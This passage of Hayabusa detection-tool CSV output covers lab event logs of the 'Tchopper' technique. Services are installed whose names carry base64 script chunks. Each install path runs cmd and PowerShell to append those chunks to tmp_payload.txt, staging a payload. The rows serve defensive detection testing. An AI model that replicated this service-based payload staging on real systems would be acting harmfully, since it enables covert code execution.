start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:10.344 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:20.573 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 